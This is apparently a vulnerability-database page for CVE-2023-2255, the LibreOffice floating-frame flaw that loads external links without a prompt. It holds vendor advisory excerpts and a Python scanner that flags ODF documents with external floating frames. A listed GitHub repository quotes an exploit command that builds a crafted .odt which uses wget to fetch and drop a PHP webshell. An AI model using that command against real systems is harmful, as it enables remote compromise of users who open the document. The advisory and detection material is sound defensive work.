CVE-2023-2255

Published: 25/05/2023 Updated: 26/11/2023
CVSS v3 Base Score: 5.3 | Impact Score: 1.4 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

Improper access control in editor components of The Document Foundation LibreOffice allowed a malicious user to craft a document that would cause external links to be loaded without a prompt. In the affected versions of LibreOffice, documents that used "floating frames" linked to external files would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions before 7.4.7; 7.5 versions before 7.5.3.
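A triage check for the floating-frame behaviour described above, as an added example that is not part of the advisory or of LibreOffice: it lists ODF `draw:floating-frame` elements whose `xlink:href` points outside the document package. Treating `./` and `#` targets as package-internal is an assumption of this sketch, and the sample documents are constructed.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

DRAW = "urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"
XLINK = "http://www.w3.org/1999/xlink"
MAX_PART = 50 * 1024 * 1024  # refuse oversized XML parts (zip-bomb guard)

def external_floating_frames(odf_bytes):
    """Return [(part, href)] for floating frames whose target is outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(odf_bytes)) as pkg:
        for part in ("content.xml", "styles.xml"):
            if part not in pkg.namelist():
                continue
            if pkg.getinfo(part).file_size > MAX_PART:
                raise ValueError(f"{part} too large to scan")
            data = pkg.read(part)
            # ODF parts normally carry no DTD; reject one (entity-expansion guard).
            if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
                raise ValueError(f"{part} declares a DTD; not parsing")
            for el in ET.fromstring(data).iter(f"{{{DRAW}}}floating-frame"):
                href = el.get(f"{{{XLINK}}}href", "")
                # Assumption: "./..." and "#..." targets stay inside the package.
                if href and not href.startswith(("./", "#")):
                    hits.append((part, href))
    return hits

def _sample(href):
    """Constructed sample: a minimal ODF-like package with one floating frame."""
    xml = ('<office:document-content '
           'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
           f'xmlns:draw="{DRAW}" xmlns:xlink="{XLINK}"><office:body><draw:frame>'
           f'<draw:floating-frame xlink:href="{href}"/></draw:frame></office:body>'
           '</office:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("content.xml", xml)
    return buf.getvalue()

if __name__ == "__main__":
    for href in ("https://example.invalid/linked.odt", "./Object 1"):
        print(href, "->", external_floating_frames(_sample(href)))
```

Flat XML documents such as `.fodt` are not zip packages and raise `zipfile.BadZipFile` here; a hit means the document should be reviewed, not that it is malicious.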

Vulnerable Product

libreoffice libreoffice

debian debian linux 11.0

Vendor Advisories

Synopsis: Moderate: libreoffice security update. Type/Severity: Security Advisory: Moderate. Topic: An update for libreoffice is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as hav ...
Two security issues were discovered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowledged loading of linked documents within a floating frame. For the stable distribution (bullseye), these problems have been fixed in version 1:704-4+deb11u7. We recommend ...
Description: A vulnerability was found in LibreOffice. Improper access control in the editor components of The Document Foundation in LibreOffice allows an attacker to craft a document that causes external links to load without a prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, the ...

Github Repositories

CVE-2023-2255 Libre Office

CVE-2023-2255: RCE & load of external resources found by @Icare1337. nvdnistgov/vuln/detail/CVE-2023-2255 Exploit: Just an example to drop a webshell in current directory: python3 CVE-2023-2255py --cmd 'wget rawgithubusercontentcom/elweth-sec/CVE-2023-2255/main/webshellphp' --output 'exploitodt'

exploit from CVE-2023-2255

CVE-2023-2255 exploit from CVE-2023-2255